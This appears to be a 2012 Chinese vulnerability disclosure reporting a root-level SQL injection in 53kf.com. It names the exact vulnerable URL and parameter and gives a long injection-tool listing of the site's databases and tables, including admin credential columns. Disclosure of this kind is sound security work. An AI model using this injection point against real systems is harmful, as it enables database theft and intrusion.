继续53KF平台root注入和clzzy兄弟一样求礼物!

2012-10-11T00:00:00
ID SSV:94375
Type seebug
Reporter Root
Modified 2012-10-11T00:00:00

Description

简要描述:

53kf.com的SQL严重注入漏洞导致主站及其多个分站数据库可以被脱裤,Mysql用户为Root,虽不能写文件,但是可以读文件,文件代码看光光~~由于找不到后台,暂时没拿到webshell,反正拿不拿shell估计都是20个Rank,所以懒得费劲了~借用一下clzzy的描述就不打字了!求礼物

详细说明:

53kf.com的SQL严重注入漏洞导致主站及其多个分站数据库可以被脱裤,Mysql用户为Root,虽不能写文件,但是可以读文件,文件代码看光光~~由于找不到后台,暂时没拿到webshell,反正拿不拿shell估计都是20个Rank,所以懒得费劲了~借用一下clzzy的描述就不打字了!求礼物

漏洞证明:

Target: http://kf1.53kf.com/iframe_brief.php?style_id=%Inject_Here%&language=cn10009 Date: 2012/10/11 10:24:38 DB Detection: MySQL >=5 (Auto Detected) Method: GET Type: Integer (Auto Detected)


数据表 talk Table Name Columns C3P0TestTable
access
access_log
account_switch
ad
agent_oper
agent_style_lock
announcement
area_kf ask_kw
autoreply
block_user id company_id guest_id guest_ip start_time release_time block_reason id6d block_trace chat_nation chat_search chat_tables chat_worker company company_ad
company_config
company_etel
company_style
company_tinet
company_tinet_cno
conf_ip1
conf_ip1_old
conf_sync
config_id_remark
config_value_remark counter cus_bill
cus_group
cus_link
cus_mail
cus_sms cus_theme
cus_user
cus_web_msg customer
customer2
customer3
cyy cyy_group
daemonlog_recv
daemonlog_send
download_job
email
err_infos
err_infos_kf
etel_logo
face
file
identity
identity_role_id
ill_words
imessage
inner_identity
kehu_mail
kf_group
kf_group_newthing
kf_group_newthing_old
kf_group_upload kf_group_upload_old kf_share
link
link_room
logo
logsql
mail_template
mailqueue
message module
module_special
msg_reply
operate_log payment robot
robot_mem
room_message
sms_bill
sms_config
sms_lword
sql_sync
stat_keyword_month
stat_place
stat_search stat_search_old stat_to statistic
statistic_from
statistic_nation
statistic_net
sta information_schema Table Name Columns acc Table Name Columns C3P0TestTable
cus_user
visitor_trace
crm Table Name Columns action_log
conf_sync
crm_ViewDt
crm_ViewDt_bank crm_column
crm_cust_field
crm_cust_linkman
crm_customer
crm_customer_bak
crm_customer_bak2
crm_customer_keywordisnull
crm_data_char
crm_data_int
crm_data_item
crm_downexport
crm_fieldDt crm_keyword crm_linkman crm_linkman_ViewDt
crm_linkman_ViewDt_bank crm_linkman_column
crm_linkman_field
crm_linkman_fieldDt crm_linkman_view
crm_manage_module
crm_order
crm_public_field
crm_survey
crm_survey_info crm_survey_question crm_survey_range
crm_survey_result
crm_view
cus_bill
cus_link
cus_mail
cus_sms cus_theme
daemonlog_recv
daemonlog_send
mailqueue
operate_log setting help Table Name Columns wp_commentmeta
wp_comments wp_links
wp_options
wp_postmeta wp_posts
wp_term_relationships
wp_term_taxonomy
wp_terms
wp_usermeta wp_users
income Table Name Columns check_flow
check_log
check_method
expend
expend_check_flow
expend_summary
income
operate_log sort
summary ip Table Name Columns _city_ip
city_ip city_ip0
city_ip10
city_ip13
city_ip16
city_ip19
city_ip22
city_ip25
city_ip28
city_ip31
city_ip34
city_ip37
code_country
country_ip
new_ip
new_ip2 ip_src Table Name Columns city_ip0
city_ip10
city_ip13
city_ip16
city_ip19
city_ip22
city_ip25
city_ip28
city_ip31
city_ip34
city_ip37
code_country
country_ip
jianyi Table Name Columns jy_feedback jy_feedback_index
jy_field
jy_logs jy_role jy_tpl
jy_userinfo job Table Name Columns qs_ad
qs_ad_category
qs_admin
qs_admin_log
qs_article
qs_article_category qs_article_property qs_category qs_category_district
qs_category_group
qs_category_jobs
qs_company_down_resume
qs_company_favorites
qs_company_interview
qs_company_profile
qs_config
qs_explain
qs_explain_category qs_feedback qs_jobs qs_jobs_contact qs_link qs_link_category
qs_locoyspider
qs_mail_templates
qs_mailconfig
qs_members
qs_members_info qs_members_points
qs_members_points_report
qs_members_points_rule
qs_members_setmeal
qs_members_type qs_navigation
qs_navigation_category
qs_notice
qs_notice_category
qs_order
qs_page qs_payment
qs_personal_favorites
qs_personal_jobs_apply
qs_report
qs_resume
qs_resume_education qs_resume_jobs
qs_resume_training
qs_resume_work
qs_setmeal
qs_text kf Table Name Columns 53kf_sync
access_log_tgfj ad
ad_manage
ad_stat admin_agent admin_group admin_logs
admin_oper
admin_recharge_bill admin_role
admin_tinet_article admin_user id user_name real_name password add_time last_login last_ip role_id is_admin recharge_money recharge_coupon agent_apply agent_bbs id worker_id author title content click rep_num type date last_poster last_date agent_bbs_message
agent_bill
agent_bill_log
agent_bill_old
agent_check_bill
agent_check_money
agent_comment
agent_company
agent_config
agent_download
agent_group agent_handle_log
agent_oper
agent_oper_inf
agent_oper_log
agent_policy
agent_price_config
agent_receipt_bill
agent_receipt_express
agent_rights
agent_style_lock
agent_worker
announcement
appointment area_kf ask_act_log authentication
auto_pay_fail_log
autoreply
bank_infor
blacklist
blacklist_log
bug_reply_log
bug_report
bug_report_log
category
city_app
city_case
classic_case
click_ip
company company_account company_ad
company_bill
company_bill_old
company_config
company_coupon
company_cyy company_etel
company_etel_bill
company_exp_vouchers
company_exp_vouchers_bill
company_exp_vouchers_code
company_extra
company_lottery company_lottery_address company_lottery_log company_mail
company_mail_bill
company_operation_log
company_receipt_bill
company_recharge_gift
company_sms company_sms_bill
company_style
company_template
company_tinet
company_tinet_bill
company_tinet_cno
company_tinet_open
company_tinet_sms
company_tinet_time
conf_ip1
conf_ip1_bak
conf_sync
conf_sync_ip
config_id_remark
config_value_remark consumption_stat
coupon_bill cps_commission_log
cps_netraffic
crm_senduser
cus_group
customer
customer_bill
customer_link
daemonlog_recv
daemonlog_send
dingxin err_infos
etel_logo
face
friendlink
gggj_spread_log gift_module_log gm_admin
gm_company
gm_group
gm_info help
identity
index_hot
kf_admin
kf_center_check kf_class
kf_company
kf_group
kf_handle_log
kf_info kf_qytx_group
kf_sell login_from_vb
logo
logsql
lost_company
mail_template
manage_salelist member
member_grade_config menu
mobile_record
module
module2 module_bag
module_open_setting module_recharge_log module_special
module_style_num_bak
module_test_log module_try_days order
order_cancel
order_product
outlink_withdrawing_log package_product pay_company pay_company_bymonth pay_company_old payment payment2
payment_multy
product product_commend product_exp product_group
product_img product_price
product_promote product_pub product_recharge_center product_review
product_review_replay
product_sell_stat
purge_cache reg_error
reg_sync
reply
report_badweb
review_award
robot
robot_mem
sales_area
slave_to_master_sync
sms_bill
sms_config
sms_send_log
sms_sp
suggest suggest_old suggest_reply
suggest_reply_old
suggest_type
sys_name
system_module
talk_subject
tmp_smslog
topic
union_company
unsubscribe_company v5_ad
v5_admin_oper
v5_agent_oper
v5_cate v5_cate_stat
v5_comment
v5_comment_del
v5_company
v5_company_account
v5_company_bill v5_company_cate v5_company_config
v5_company_indus
v5_company_refer
v5_company_talk v5_doctor
v5_favor
v5_friend
v5_hotinfos v5_indus
v5_ip
v5_jubao
v5_leave
v5_net_ad
v5_person
v5_person_bill
v5_person_cate
v5_product
v5_refer
v5_reply
v5_subject
v5_sync v5_system_info
v5_test v5_worker
vip_refer_sync
worker
worker_config
worker_group
worker_point_log
zs_admin
zs_class
zs_company
zs_group
zs_help zs_info zsk_category
zsk_key zsk_question
kf1 Table Name Columns ad_count
ad_count2
city_company
daemon
daemon_sms
finance_bill
inout_class inout_site
inout_stat
kf_tuo
kf_tuo070416
kf_tuo_log
kf_tuo_mark kf_tuo_rank lottery mailqueue
oper_log
rank
sms_lword
sms_queue
talk_server v5_chat_count
worker
mail Table Name Columns mail_account
mail_checkuser
mail_classify
mail_config mail_filter mail_linkman
mail_log
mail_receiver
mail_record mail_role
mail_sendmail
mail_senduser
mail_share
mail_template
mantis Table Name Columns mantis_bug_file_table
mantis_bug_history_table
mantis_bug_monitor_table
mantis_bug_relationship_table
mantis_bug_revision_table
mantis_bug_table
mantis_bug_tag_table
mantis_bug_text_table
mantis_bugnote_table
mantis_bugnote_text_table
mantis_category_table
mantis_config_table mantis_custom_field_project_table
mantis_custom_field_string_table
mantis_custom_field_table
mantis_email_table
mantis_filters_table
mantis_news_table
mantis_plugin_table mantis_project_file_table
mantis_project_hierarchy_table
mantis_project_table
mantis_project_user_list_table
mantis_project_version_table
mantis_sponsorship_table
mantis_tag_table
mantis_tokens_table mantis_user_pref_table
mantis_user_print_pref_table
mantis_user_profile_table
mantis_user_table
mysql Table Name Columns newadv Table Name Columns accountdt
alert_config
back_money
blacklist
cart
favorites
history_order
history_orderdt income_money
mylink
new_order
new_orderdt pay_money
recharge_money
sys_config
user
webpage website website_type
withdrawing_money
newcrm Table Name Columns client_class
crm_area
crm_birthday_tip
crm_contact_record_status
crm_cust_com
crm_cust_linkman
crm_cust_share
crm_customer
crm_customer_care
crm_customer_column crm_customer_contact
crm_customer_d1 crm_customer_field
crm_customer_fieldAt
crm_customer_fieldDt
crm_customer_view
crm_delivery
crm_delivery_addr
crm_downcenter
crm_email_link
crm_email_read
crm_field_set
crm_kf_complaint
crm_kf_complaint_type
crm_kf_record
crm_kf_server_type
crm_kf_server_way
crm_kf_time_spend
crm_kf_urgency_type crm_linkman crm_linkman_column
crm_linkman_d1
crm_linkman_field
crm_linkman_fieldAt crm_linkman_fieldDt crm_linkman_view
crm_logs
crm_marketing_activity
crm_marketing_activity_type crm_marketing_plan
crm_marketing_plan_status
crm_marketing_plan_type crm_money_record
crm_opport
crm_opport_source
crm_opport_stage
crm_opport_status
crm_order_addr
crm_order_info
crm_order_invoice
crm_order_order_sort
crm_order_pay_method
crm_orders
crm_plan
crm_porduct_unit
crm_product crm_product_sort
crm_quote
crm_quote_info
crm_senduser
crm_sfa_log crm_sfa_program crm_sfa_program_pc
crm_sfa_xulie
crm_sfa_xulie_pc
crm_table_num
crm_task
crm_task_plan_type
crm_tasks
crm_tool_knowledge
crm_tool_knowledge_category crm_tool_mail_receiver
crm_tool_notebook
crm_tool_reportdiy
crm_tool_sendemail
crm_tool_sendsms
crm_tool_sms_receiver
crm_tool_template
crm_tool_template_sms
crm_workbench
customer_sort
dictionary
dictionary_relation permission
setting newoa Table Name Columns company identity
module
oa_affair_weight
oa_asset_flow
oa_assets
oa_assets_depreciation
oa_assets_type
oa_attachment
oa_attachment_temp
oa_book oa_book_type
oa_bookdt
oa_company_protal
oa_doc_group
oa_doc_identity oa_doc_worker
oa_document oa_favorite_flow
oa_fieldarea
oa_flow oa_flow_default_worker
oa_flowdt
oa_flowfield
oa_flowgroup
oa_flowjob
oa_flownode oa_flowstate
oa_goods
oa_goods_type
oa_inform_set
oa_layer_attribute
oa_linkman
oa_linkman_group
oa_linkmangroup_acc_dpt oa_linkmangroup_acc_role
oa_linkmangroup_acc_worker
oa_mail oa_mail_account oa_mail_sys oa_mode_layer
oa_msg
oa_msg_receiver oa_my_tools oa_news oa_news_reply
oa_news_worker
oa_nodejob
oa_nodeport oa_notice
oa_notice_group oa_notice_id6d
oa_notice_identity
oa_notice_worker
oa_parameter
oa_pay
oa_pay_option
oa_portfield
oa_print_mode
oa_report
oa_report_filter
oa_report_item
oa_reportjob
oa_response_time
oa_task oa_task_affix
oa_task_group
oa_task_looker
oa_task_msg oa_task_msg_affix
oa_task_postpone
oa_task_state
oa_task_temp
oa_task_worker
oa_telephone_msg
oa_telephone_msg_sys
oa_template oa_templatedt
oa_view oa_viewdt
oa_weather_forecast oa_worker_pay
oa_worker_protal
oa_workflow oa_workflow_log oa_workflow_logdt
oa_workflow_operationlog
oa_workflow_worker
operate_log permission
worker
worker_group
worker_online_log
saas Table Name Columns cus_sms identity
operate_log role
worker
worker_group
shouzhi Table Name Columns sz_account
sz_baoxiao
sz_baoxiao_detail
sz_baoxiao_sort sz_in
sz_in_detail
sz_inout_sort
sz_log
sz_memo sz_out
sz_out_detail
sz_role sz_setting
sz_summary
sz_wage sms Table Name Columns sms_balance sms_blacklist
sms_classify
sms_config
sms_disabled
sms_linkman sms_log sms_phrase
sms_receivemsg
sms_record
sms_role
sms_sendmsg sms_sendway sms_share
tel Table Name Columns tel_blacklist
tel_config
tel_log tel_number
tel_queue
tel_recharge
tel_role
tel_seat
tel_seat_period tel_sendmsg tel_style
temp_mu Table Name Columns com_talk_online company test Table Name Columns trac Table Name Columns attachment
auth_cookie cache
component
enum
fullblog_comments
fullblog_posts
milestone
node_change permission
report
repository
revision
session session_attribute
system
ticket
ticket_change
ticket_custom
version wiki
ut Table Name Columns account_switch
area_kf block_user
chat_nation chat_search chat_worker company company_ad
company_config
company_style
company_tinet
company_tinet_cno
cus_bill
cus_group
cus_link
cus_theme
cus_user
cus_web_msg cyy cyy_group
file
identity
imessage
kf_group
kf_group_newthing
kf_group_upload kf_share
link
message module
module_special
msg_reply
operate_log robot
robot_mem
sms_config
stat_keyword_month
stat_place
stat_search stat_to statistic
statistic_from
statistic_nation
statistic_net
statistic_place talk_his
talk_theme
talk_vote
visitor_lnk visitor_trace
worker
worker_config
worker_group
worker_online_log
worker_online_log_detail
zsk_category
zsk_key zsk_noanswer
zsk_question
ut1 Table Name Columns message sync_worker_stat
sync_worker_stat2
talk_his
worker
ut_cus Table Name Columns cus_user
utt Table Name Columns message message_d1
message_d2
message_d3
message_d4
message_d5
message_d6
talk_his
talk_his_d1 talk_his_d2 talk_his_d3 talk_his_d4 talk_his_d5 talk_his_d6 utwkbak Table Name Columns company_config
worker
zentao Table Name Columns zt_action
zt_bug
zt_build
zt_burn zt_case zt_caseStep zt_company
zt_config
zt_dept zt_doc
zt_docLib
zt_effort
zt_extension
zt_file zt_group
zt_groupPriv
zt_history
zt_module
zt_product
zt_productPlan
zt_project
zt_projectProduct
zt_projectStory zt_release
zt_story
zt_storySpec
zt_task zt_taskEstimate zt_team zt_testResult
zt_testRun
zt_testTask zt_todo zt_user zt_userGroup
zt_userQuery
zt_userTPL